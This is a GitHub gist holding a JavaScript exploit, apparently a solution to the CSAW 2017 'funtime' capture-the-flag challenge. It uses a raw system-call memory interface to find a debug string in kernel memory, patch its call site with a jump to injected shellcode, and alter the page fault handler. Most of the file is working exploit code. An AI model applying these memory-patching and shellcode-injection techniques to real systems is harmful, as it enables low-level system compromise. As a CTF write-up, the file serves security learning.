/csaw-2017-funtime.js
Created Sep 24, 2017
| console.log("Starting"); | |
| function findData(lookFor) { | |
| var MEM_START_OFFSET = 1; | |
| var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF).buffer()); | |
| var locs = []; | |
| for (var i = 0; i < 0x2000000; i++) { | |
| var found = true; | |
| for (var j = 0; j < lookFor.length; j++) { | |
| if (memBuffer[i+j] != lookFor[j]) { | |
| found = false; | |
| break; | |
| } | |
| } | |
| if (found) { | |
| return (i + MEM_START_OFFSET); | |
| } | |
| } | |
| return null; | |
| } | |
| function decToHex(d) { | |
| var hex = d.toString(16); | |
| hex = "00".substr(0, 2 - hex.length) + hex; | |
| return hex; | |
| } | |
| function dumpMem(start, size) { | |
| var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(start, size).buffer()); | |
| var outStr = ""; | |
| for (var i = 0; i < size; i++) { | |
| outStr += decToHex(memBuffer[i]); | |
| } | |
| return outStr; | |
| } | |
| function writeData(writeTo, data) { | |
| var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length).buffer()); | |
| for (var i = 0; i < data.length; i++) { | |
| memBuffer[i] = data[i]; | |
| } | |
| } | |
| function writeMultipleData(writeTo, datas) { | |
| var offset = 0; | |
| for (var i = 0; i < datas.length; i++) { | |
| writeData(writeTo + offset, datas[i]); | |
| offset += datas[i].length; | |
| } | |
| } | |
| function pointerToBytes(pointer) { | |
| var result = []; | |
| for (var i = 0; i < 4; i++) { | |
| result.push((pointer >> (i*8)) & 0xFF); | |
| } | |
| return result; | |
| } | |
| var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0))); | |
| console.log("Found debug string at: ", dbgStrAddr.toString(16)); | |
| var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr)); | |
| console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16)); | |
| var codeBuf = __SYSCALL.allocDMA(); | |
| console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16)); | |
| /* | |
| 0: 48 c7 c3 00 00 e0 1c mov rbx,0x1ce00000 | |
| 7: ff e3 jmp rbx | |
| */ | |
| var jmpData = [ | |
| [0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address), | |
| [0xff, 0xe3] | |
| ]; | |
| writeMultipleData(dbgStrUsageAddr - 5, jmpData); | |
| /* | |
| 0: 48 83 c4 08 add rsp,0x8 | |
| 4: 48 bf ef ee be ad de movabs rdi,0xdeadbeeeef | |
| b: 00 00 00 | |
| e: 48 c7 c3 78 56 34 12 mov rbx,0x12345678 | |
| 15: ff e3 jmp rbx | |
| */ | |
| var shellcode = [ | |
| [0x48, 0x83, 0xc4, 0x08], | |
| [0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00], | |
| [0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4), | |
| [0xff, 0xe3] | |
| ]; | |
| writeMultipleData(codeBuf.address, shellcode); | |
| var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0))); | |
| console.log("Found page fault string at: ", invalidStrAddr.toString(16)); | |
| var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr)); | |
| console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16)); | |
| // Set unconditional jump in page fault handler | |
| writeData(invalidStrUsageAddr - 251, [0xEB]); | |
| console.log("Finished writing shellcode"); | |
| __SYSCALL.debug(); | |
| console.log("Finished calling debug"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment